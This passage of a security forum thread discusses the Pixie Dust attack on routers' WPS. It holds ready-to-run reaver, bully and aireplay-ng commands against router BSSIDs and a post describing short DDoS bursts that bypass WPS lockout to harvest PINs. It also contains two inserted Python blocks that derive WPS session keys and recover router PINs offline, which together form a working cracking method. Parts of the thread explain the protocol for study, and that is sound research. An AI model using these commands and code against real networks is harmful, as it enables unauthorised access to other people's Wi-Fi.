    d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    Well, it turns out that this device also has a static PKE!
    Code:
    91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9:bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:80:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e:84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0:69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:68:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5:23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47:0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd:07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc:7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:97:e8:40:2f:9b:97:d1:7e:7e
    I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either.
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

  13. #413
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by DetmL View Post
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?
    Yeah I know about the PIN generator, but a chip based ATTACK would be more widespread and for other manufacturers as well.

  14. #414
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by DetmL View Post
    Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?
    You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

  15. #415
    Join Date
    2015-Apr
    Posts
    12
    Quote Originally Posted by soxrok2212 View Post
    You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)
    http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

  16. #416
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Awesome thanks!

  17. #417
    On some Technicolor the modified reaver recovers the PIN but not the passphrase; it freezes on:
    Code:
    [+] Running reaver with the correct pin, wait ...
    [+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
    [Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
    [Reaver Test] [+] Channel: 11
    If such a thing happens, use bully to recover it.
    Example:
    Code:
    bully -b 18:17:25:xx:xx:xx -c 11 -B -v 2 -p xxxxxxxx
    It worked for me.

  18. #418
    Try to add -n to your reaver line
    (by the way, that is not a pixie dust issue and it should be posted somewhere else )

  19. #419
    Join Date
    2015-Jun
    Posts
    1
    What also works is running aireplay-ng to force an association with the AP while you run reaver.
    Example:
    Code:
    aireplay-ng -1 12 -a <BSSID OF AP> -h <MAC ADDR. OF WIFI CARD> mon0

  20. #420
    Join Date
    2015-Jun
    Posts
    3


    I have a TP-Link router which I cannot break. Brute forcing also doesn't work. And I have to say that this is the only router that outputs E-S1 and E-S2.
    I can see in my area about 100 devices and only this TP-Link outputs E-S1 and E-S2. My other router is an Arcadyan with the RT2860 chipset and I can read the AuthKey, PKE, etc... but E-S1 and E-S2 are never displayed by reaver.
    Is there a way to force displaying E-S1 and E-S2?
    The pixiewps description says that the Ralink chipset never generates E-S1 and E-S2 and they are always zero. How do I run pixiewps in this case?

    here is a gist with reaver output of TP LINK WR841N
    https://gist.github.com/anonymous/6184dc4f7f9fe19ef46d

  21. #421
    oh could there be progress with Atheros stuff???

  22. #422
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    oh could there be progress with Atheros stuff???
    Maybe with the Tick Tock attack, but then again there are a lot of prerequisites for the attack to work, and it will really just optimize the regular 2011 online brute force. But you never know!

  23. #423
    Join Date
    2015-Jul
    Posts
    1
    I think this may not be the correct space to ask for help with my issue; going to make a new thread sorry! please delete
    Last edited by Gurgg; 2015-07-26 at 22:08. Reason: delete

  24. #424
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Anyone familiar with IDA Pro or binwalk or examining firmwares in general?

    I found some interesting articles and documents highlighting flaws in /dev/random in embedded systems, thought I'd share them with you. If you are not experienced, you probably won't understand much of it (that's me), but from what I understand, embedded systems from before July 2012 (or maybe even after) may be potentially vulnerable as they don't have a sufficient amount of entropy after being plugged in. The problem with newer devices (not sure about older devices) is that upon reboot, they save the entropy pool through a reboot/power loss. This is why forcing/DOSing an AP so it reboots is not effective in clearing entropy pools. I'm not sure if the same feature exists in pre-2012 devices, so it may be something worth looking into. Heck, it's even something Dominique noted in his presentations.

    I guess one of the maintainers of /dev/random in Linux commented on his worries about the subject here: https://news.ycombinator.com/item?id=6548893

    And the whole conference is available here: https://factorable.net/weakkeys12.conference.pdf

    What's even more intriguing about this is that older hardware is more susceptible to DOS/forced rebooting. The research paper explains how there were a lot of duplicate security keys used in various embedded systems, including "enterprise-grade routers from Cisco; server management cards from Dell, Hewlett-Packard, and IBM; virtual-private-network (VPN) devices; building security systems; network attached storage devices; and several kinds of consumer routers and VoIP products" (quoted from conference.pdf). This is what made them question the implementation. If there are a lot of duplicate keys, then there must not have been sufficient entropy feeding the PRNGs.

    t6_x has ventured into the realm of Atheros devices and found that in hostapd, the WPS protocol is stopped before sending the M3 message if there is not sufficient entropy.

    As you can see, there are many barriers to break, but much possibility for older devices, or maybe even newer devices if they don't include the patch released following the research. I mean, some manufacturers had zero security so anything is possible!

  25. #425
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212

    As we have noted to you in e-mails referencing field experiments on opening a WPS-locked system - this DOS/forced rebooting does not seem to result in a total router reboot and the removal of the WPS locking mechanism. Rather it seems to affect the internal systems, allowing for the collection of a small number of pins after the router is subjected to a short (15-20 sec) but intense DDOS process. Hence the WPS system always shows a locked state, but small numbers of WPS pins can be collected after a DDOS and rest period. Usually approx. 5 to 10 pins can be harvested every 360 seconds as a general rule.

    Furthermore this short DDOS process sometimes results in the WPS pin resetting to 12345670. We have embedded this pin retest function into the VMR-MDK process which can considerably shorten the attack time required.


    In field trials we have been getting good results from our lab variant VMR-MDK011x8 that we sent you which employs pixiedustwps1.1 and the automatic adding of any WPS pin found into the 4 stage attack process as well. However this is not a magic bullet and only a subset of routers are vulnerable to this approach.

    MTeams

  26. #426
    Join Date
    2015-Jul
    Posts
    4
    Hi,
    I have a question:
    for offline cracking you need the KeyWrapKey and AuthKey? How can you find them?

    thanks for help!
    Last edited by lllhamedlll; 2015-07-30 at 05:54.

  27. #427
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by lllhamedlll View Post
    Hi,
    I have a question:
    for offline cracking you need the KeyWrapKey and AuthKey? How can you find them?

    thanks for help!
    You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.

  28. #428
    Join Date
    2015-Jul
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    You don't need the KeyWrapKey. It is used for making a bunch of other keys. The Authkey is printed in reaver, which is also included in Kali. Use -vvv for the verbosity mode.
    Thanks... and how can we derive AuthKey manually, before starting the attack?
    We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, "Wi-Fi Easy and Secure Key Derivation", 640)

    so we should know the value on the right side of the equation... so we have AuthKey... right?

    I want to study the attack in detail... thanks...
    Last edited by lllhamedlll; 2015-07-31 at 09:09.

  29. #429
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by lllhamedlll View Post
    Thanks... and how can we derive AuthKey manually, before starting the attack?
    We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, "Wi-Fi Easy and Secure Key Derivation", 640)

    so we should know the value on the right side of the equation... so we have AuthKey... right?

    I want to study the attack in detail... thanks...
    All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach...50FCFFCB3EC74E

    Look on page 37.

    You can also watch Dominique's video: http://video.adm.ntnu.no/pres/549931214e18d and look at his slides: http://archive.hack.lu/2014/Hacklu20...ack_on_wps.pdf

    They'll help you a lot Glad to see someone who, like me, wants to understand the attack rather than just do it

  30. #430
    Quote Originally Posted by lllhamedlll View Post
    Thanks... and how can we derive AuthKey manually, before starting the attack?
    We have KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2)... DHKey = SHA-256(g^AB mod p)... and

    AuthKey || KeyWrapKey || EMSK = kdf(KDK, "Wi-Fi Easy and Secure Key Derivation", 640)

    so we should know the value on the right side of the equation... so we have AuthKey... right?

    I want to study the attack in detail... thanks...
    The WPS protocol uses the Diffie-Hellman key exchange, which is a method of securely exchanging cryptographic keys over a public channel. The AP wants to talk to the Client, but they don't want anyone else to be able to eavesdrop on their conversation.

    To accomplish this, they both generate a pair of keys (a public key and a private key):

    - First the AP generates a (hopefully) random private key (A).
    - Then it generates its public key, PKe = g^A mod p, where g and p are known and described by the WPS protocol, and sends it to the Client (with M1).

    Now, it's the turn of the Client to generate its pair of keys:
    - random private key (B)
    - PKr = g^B mod p, and sends PKr to the AP (with M2).

    At this point they both have each others public key and find the 'shared secret', a common key used to set up a secure channel.

    To find the shared secret (g^(AB) mod p):
    - the AP does: shared_secret = PKr^A mod p (which is equal to g^(AB) mod p)
    - the Client does: shared_secret = PKe^B mod p (which is equal to g^(AB) mod p)

    It may seem like magic at first, but it's simple math.

    From this point on the WPS protocol imposes these steps:
    - DHKey = SHA-256(shared_secret)
    - KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce), DHKey is used as key for the hash function
    - AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)

    where || denotes concatenation (kdf outputs a sequence of bytes, the first 256 are for AuthKey...).

    AuthKey stands for Authentication session Key and it is, in fact, a session key.

    Now, if you are thinking of something like "I sniff packets with Wireshark and then I generate AuthKey with the data collected": no, you can't. The Diffie-Hellman key exchange does not allow eavesdropping. It all starts with the pair of keys (public and private). To get to AuthKey you need the private key of one of the two involved entities (AP or Client). So Pixiewps needs AuthKey to work, which is provided by Reaver/Bully.

    After M2 (before M3) they both have a secure channel to talk in.

    However, Reaver >= 1.3 has a feature called "Small Diffie-Hellman keys" (-S, --dh-small). Enabling this feature causes Reaver to choose a static, non-random private key, specifically the number 1.

    So if we use this feature with Reaver, then the shared_secret becomes: g^(AB) mod p = PKe^B mod p = PKe mod p = PKe (g = 2, B = 1, p > 2).

    PKe is calculated as g^A mod p, meaning that, PKe mod p = PKe (< p).

    EDIT: of course you can calculate AuthKey every time you know the private number (it doesn't have to be 1). With 1 it's just simpler.
    Last edited by wiire; 2015-08-01 at 09:46. Reason: Added more info, fixed typo
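    The derivation wiire walks through above, carried out end to end as an added example (this is not code from the original post, nor from Reaver or Pixiewps). Both sides of the M1/M2 exchange compute the same shared secret, then DHKey, KDK and finally AuthKey || KeyWrapKey || EMSK through the WPS kdf (HMAC-SHA-256 in counter mode over the "Wi-Fi Easy and Secure Key Derivation" label, 640 bits). The second case reproduces the Reaver -S trick: with registrar private key B = 1, the shared secret is simply PKe. Assumptions: the RFC 3526 1536-bit MODP group (g = 2) is the DH group WPS uses; the nonces and enrollee MAC are constructed sample values; all function names are mine.

```python
import hashlib
import hmac
import secrets
import struct

# RFC 3526 1536-bit MODP group (group 5), generator 2: the DH group WPS uses.
# Constant assumed from RFC 3526; check it against the RFC before relying on it.
P_HEX = (
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF"
)
P = int(P_HEX, 16)
G = 2
KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def dh_keypair(private=None):
    """Return (private, public); public = g^private mod p as 192 big-endian bytes.
    Pass private=1 to mimic Reaver -S (--dh-small)."""
    if private is None:
        private = secrets.randbelow(P - 2) + 1          # 1 <= private <= p-2
    return private, pow(G, private, P).to_bytes(192, "big")


def shared_secret(peer_public, private):
    """peer_public^private mod p, i.e. g^(AB) mod p, as 192 big-endian bytes."""
    return pow(int.from_bytes(peer_public, "big"), private, P).to_bytes(192, "big")


def wps_kdf(key, total_bits):
    """WPS kdf(): concatenate HMAC-SHA-256(key, i || label || total_bits) for i = 1..n,
    i and total_bits as 32-bit big-endian, then truncate to total_bits."""
    out = b""
    for i in range(1, (total_bits + 255) // 256 + 1):
        msg = struct.pack(">I", i) + KDF_LABEL + struct.pack(">I", total_bits)
        out += hmac.new(key, msg, hashlib.sha256).digest()
    return out[: total_bits // 8]


def derive_keys(secret, enrollee_nonce, enrollee_mac, registrar_nonce):
    """DHKey -> KDK -> (AuthKey, KeyWrapKey, EMSK), the three steps listed in the post."""
    dhkey = hashlib.sha256(secret).digest()
    kdk = hmac.new(dhkey, enrollee_nonce + enrollee_mac + registrar_nonce,
                   hashlib.sha256).digest()
    keys = wps_kdf(kdk, 640)                              # 80 bytes
    return keys[:32], keys[32:48], keys[48:80]            # 256 + 128 + 256 bits


def run_exchange(registrar_private=None):
    """Both sides of M1/M2. Returns (ap_keys, client_keys, pke, client_shared_secret).
    Nonces and the enrollee MAC are constructed sample values."""
    a, pke = dh_keypair()                                 # AP (enrollee): PKe travels in M1
    b, pkr = dh_keypair(registrar_private)                # client (registrar): PKr travels in M2
    n1 = secrets.token_bytes(16)                          # enrollee nonce from M1
    n2 = secrets.token_bytes(16)                          # registrar nonce from M2
    mac = bytes.fromhex("001122334455")                   # constructed enrollee MAC
    s_ap = shared_secret(pkr, a)                          # AP computes PKr^A mod p
    s_client = shared_secret(pke, b)                      # client computes PKe^B mod p
    return (derive_keys(s_ap, n1, mac, n2),
            derive_keys(s_client, n1, mac, n2), pke, s_client)


if __name__ == "__main__":
    ap_keys, client_keys, pke, secret = run_exchange(registrar_private=1)
    print("AuthKey match:", ap_keys == client_keys)
    print("shared secret == PKe with B = 1:", secret == pke)
    print("AuthKey:", ap_keys[0].hex())
```

    With B = 1 the registrar's own public key PKr = g^1 mod p = 2, so an AP log showing a 192-byte PKr that is all zero bytes except a trailing 0x02 is a giveaway that Reaver -S is in use. Whoever holds either private exponent can rebuild AuthKey from the captured nonces and MAC; a passive observer with only PKe and PKr cannot, which is exactly why Pixiewps takes AuthKey from Reaver or Bully rather than from a pcap.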

  31. #431
    Join Date
    2015-Jul
    Posts
    4

    Red face

    Quote Originally Posted by soxrok2212 View Post
    All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach...50FCFFCB3EC74E

    Look on page 37....
    Quote Originally Posted by wiire View Post
    The WPS protocol uses the Diffie-Hellman key exchange, which is a method of securely exchanging cryptographic keys over a public channel. Alice wants to talk to Bob, but they don't want anyone else to be able to eavesdrop on their conversation....

    thanks soxrok2212 !!!

    i will study them...

    and of course thanks to wiire !!!

    I think it is not possible to explain it better...

    Is this the latest and best attack on WPS, or not?
    Last edited by lllhamedlll; 2015-08-01 at 10:27.

  32. #432
    Join Date
    2015-Aug
    Posts
    2
    Screenshot_2015-7-8-11-20.jpg
    Do these scripts work on NetHunter? Sorry for the bad capture, I couldn't do it any other way, but you see the point: I can't use mdk3 either from Kali or the Team Musket one after make install of mdk3-v6.
    Last edited by zen4; 2015-08-08 at 22:03.

  33. #433
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I don't know, my only pentesting platform is Kali on my laptop. You'd have to ask in the nethunter part of this forum.

  34. #434
    Join Date
    2015-Aug
    Posts
    1
    thank you very much

  35. #435
    Join Date
    2015-Aug
    Posts
    1
    Hi

    I run Reaver -i wlan0mon -c xx -b mac -K 1

    on 3 of my routers. I have a D-Link, a Netgear and a Belkin. It runs to completion but only finds the password on the older Belkin router; on the others it says PIN NOT FOUND.

    Am I doing something wrong, or is this normal and this type of attack no longer works on newer routers? Is there anything better to try?

    Thanks

  36. #436
    Join Date
    2015-Aug
    Posts
    4
    Quote Originally Posted by wn722 View Post
    anyone tried TP-Link devices?
    I got some 740,841 and it's zip.
    I have tried many times with TP-Link devices and no luck...
    When I was playing with Wireshark and looking at TP-Link chipsets, most of them use Atheros.

  37. #437
    Join Date
    2015-Jul
    Posts
    4
    I can't find the answer to my question anywhere... and can't message anyone in this forum... so I'm forced to ask here:
    In the PBC method the enrollee doesn't know any secret value... just press the button and finish! So how is it possible to send the M3, M5 or M7 message? It seems that in this method sending these values is not necessary!

  38. #438
    From what I've seen, even a Push Button Event is still a normal WPS transaction. It still runs through the whole M1 through M8; it will just accept, I think, any pin you throw at it. I tested that a while ago: PBE, then with reaver I tried pin 00000000 and it went through successfully as a full WPS transaction and retrieved the PSK.

  39. #439
    Join Date
    2015-Sep
    Posts
    1
    Quote Originally Posted by therookie9 View Post
    Hi

    I run Reaver -i wlan0mon -c xx -b mac -K 1

    on 3 of my routers. I have a D-Link, a Netgear and a Belkin. It runs to completion but only finds the password on the older Belkin router; on the others it says PIN NOT FOUND.

    Am I doing something wrong, or is this normal and this type of attack no longer works on newer routers? Is there anything better to try?

    Thanks
    This means your router is invulnerable to Pixie Dust Attack

  40. #440
    Join Date
    2015-Sep
    Posts
    5
    Hi soxrok2212 !!!

    Thanks for the WPS Pixie Dust Database.xls file. In column F (Vulnerable?) = No. Does it mean the specified chip won't be vulnerable with the -f option either, or just with the -K option of reaver?

  41. #441
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by blackdream View Post
    Hi soxrok2212 !!!

    Thanks for the WPS Pixie Dust Database.xls file. In column F (Vulnerable?) = No. Does it mean the specified chip won't be vulnerable with the -f option either, or just with the -K option of reaver?
    I think you are a bit confused here, -f is ONLY for Realtek devices when E-S1 and E-S2 are not generated within the same second, or within a few seconds of the Nonce. All -f does is it runs all the possible seeds through the PRNG (seeds in this specific case are time in seconds since Epoch). -f is NOT a solution to any router, ONLY Realtek when E-S1 and E-S2 are not generated the same second, or within a few seconds of the Nonce. In the database, "No" means that the specified AP is NOT currently vulnerable to the Pixie Dust attack.
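    What -f (or the plain -K run) ultimately feeds into is the offline check Pixiewps performs once it has AuthKey: every candidate (E-S1, E-S2) pair produced for a seed is tested against the E-Hash1/E-Hash2 values the AP sent in M3, and a hit reveals the PIN halves. This added example (my code, not Pixiewps or Reaver) shows that check using the WPS definitions PSK1 = first 128 bits of HMAC_AuthKey(first PIN half), E-Hash1 = HMAC_AuthKey(E-S1 || PSK1 || PKE || PKR), and likewise for the second half (whose last digit is a checksum, so only 10^3 guesses). The vendor PRNGs that -f enumerates are not implemented here; any generator of candidate pairs can be plugged in, and the constructed case uses the all-zero nonces the thread discusses. AuthKey, PKE, PKR and the PIN are constructed values; all function names are mine.

```python
import hashlib
import hmac
import secrets


def hmac256(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()


def pin_checksum(pin7):
    """Checksum digit appended to the first seven digits of a WPS PIN."""
    accum, p = 0, pin7
    while p:
        accum += 3 * (p % 10); p //= 10
        accum += p % 10; p //= 10
    return (10 - accum % 10) % 10


def psk_half(authkey, half):
    """PSK1/PSK2: first 128 bits of HMAC_AuthKey over the ASCII digits of one PIN half."""
    return hmac256(authkey, half.encode())[:16]


def e_hash(authkey, e_s, psk, pke, pkr):
    """E-Hash1/E-Hash2 = HMAC_AuthKey(E-S || PSK || PKE || PKR), sent by the enrollee in M3."""
    return hmac256(authkey, e_s + psk + pke + pkr)


def recover_pin(authkey, pke, pkr, e_hash1, e_hash2, es_candidates):
    """Offline PIN recovery. For each candidate (E-S1, E-S2) pair (one pair per PRNG seed in a
    -f style run), try 10^4 first halves against E-Hash1, then 10^3 second halves against
    E-Hash2. Returns the 8-digit PIN, or None if no candidate pair matches."""
    for es1, es2 in es_candidates:
        first = None
        for i in range(10000):
            half = f"{i:04d}"
            if e_hash(authkey, es1, psk_half(authkey, half), pke, pkr) == e_hash1:
                first = half
                break
        if first is None:
            continue                                 # wrong E-S1 guess: try the next seed
        for j in range(1000):
            pin7 = int(first) * 1000 + j
            half = f"{j:03d}{pin_checksum(pin7)}"    # checksum digit is not guessed
            if e_hash(authkey, es2, psk_half(authkey, half), pke, pkr) == e_hash2:
                return first + half
    return None


def constructed_m3(pin, e_s1, e_s2):
    """Constructed stand-in for what Reaver hands over: AuthKey plus the M1/M2/M3 values.
    The enrollee picks E-S1/E-S2; the weak (predictable) nonces are passed in by the caller."""
    authkey = hashlib.sha256(b"constructed AuthKey for the example").digest()
    pke = hashlib.sha256(b"constructed PKe").digest() * 6       # 192-byte stand-in
    pkr = hashlib.sha256(b"constructed PKr").digest() * 6
    eh1 = e_hash(authkey, e_s1, psk_half(authkey, pin[:4]), pke, pkr)
    eh2 = e_hash(authkey, e_s2, psk_half(authkey, pin[4:]), pke, pkr)
    return authkey, pke, pkr, eh1, eh2


def demo():
    """Random valid PIN, enrollee using all-zero E-S1/E-S2, one candidate pair: returns
    (true_pin, recovered_pin)."""
    pin7 = secrets.randbelow(10 ** 7)
    pin = f"{pin7:07d}{pin_checksum(pin7)}"
    zero = bytes(16)
    authkey, pke, pkr, eh1, eh2 = constructed_m3(pin, zero, zero)
    return pin, recover_pin(authkey, pke, pkr, eh1, eh2, [(zero, zero)])


if __name__ == "__main__":
    true_pin, found = demo()
    print("true PIN:", true_pin, "recovered:", found)
```

    The cost is what makes this "offline": at most 11,000 HMACs per candidate pair, against the 11,000 live M4/M6 round trips of a classic Reaver brute force. When the AP's E-S1/E-S2 come from a strong random source the candidate list is effectively infinite and the loop never hits, which is what "No" in the database means in practice.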

  42. #442
    Join Date
    2015-Sep
    Posts
    5
    Thank you soxrok2212 !!

  43. #443
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Just re-installed KL1.1.0a, and when trying to apt-get install, libssl-dev, libpcap-dev and libsqlite3-dev I get this..

    root@kali:~# apt-get install libssl-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    libssl-dev is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    root@kali:~# apt-get install libpcap-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    E: Unable to locate package libpcap-dev
    root@kali:~# apt-get install libsqlite3-dev
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    E: Unable to locate package libsqlite3-dev
    root@kali:~#
    Any ideas?
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  44. #444
    Join Date
    2015-Apr
    Posts
    29
    sudo gedit /etc/apt/sources.list

    Code:

    #

    # deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

    #deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free

    deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
    deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free

    deb-src http://http.kali.org/kali sana main non-free contrib
    deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

    deb http://http.kali.org/kali sana main non-free contrib

    deb http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free

    deb http://repository.spotify.com stable non-free
    and

    sudo apt-get install linux-headers-$(uname -r)

  45. #445
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    thanks Laserman75, I was afraid that "sudo apt-get install linux-headers-$(uname -r)" would break my installation since it's not the latest Kali. Same for those "sana" repos, I presume? Will it all work with KL1.1.0a??

    Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

    Edit2: anyways I've installed manually and everything works beautifully..

    https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then installed them in this order..

    dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
    dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
    dpkg -i libpcap-dev_1.3.0-1_all.deb
    dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
    dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

    Nice to see mon0 again
    Last edited by Quest; 2015-10-12 at 20:30.

  46. #446
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    thanks Laserman75, I was afraid that "sudo apt-get install linux-headers-$(uname -r)" would break my installation since it's not the latest Kali. Same for those "sana" repos, I presume? Will it all work with KL1.1.0a??

    Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0

    Edit2: anyways I've installed manually and everything works beautifully..

    https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then installed them in this order..

    dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
    dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
    dpkg -i libpcap-dev_1.3.0-1_all.deb
    dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
    dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
    dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb

    Nice to see mon0 again
    So are you all set then?

  47. #447
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    yup set and happy to see 1.1.0

  48. #448
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Quest View Post
    yup set and happy to see 1.1.0
    Awesome, I am also considering building a new rig, if i can find the money... wondering if I should go with 1.1.0 or 2.0...

  49. #449
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Strange situation we are in. The good news is, one does not prevent the other. As a main OS though... good luck with that. What they were thinking upstream worries me a bit more... Wish I could be a bit more constructive, but really I'm lost (more than usual).

  50. #450
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'd just like to leave a comment here: as of today, November 21, 2015, 56/96 devices reported have been confirmed vulnerable. That's 58.3%! While I assure you this is not real-world accurate, as people probably don't report as many failed tests as successful tests, these are still some pretty high numbers! If you manage to find more, both vulnerable and not vulnerable, please report here! Thanks! https://docs.google.com/spreadsheets...gid=2048815923
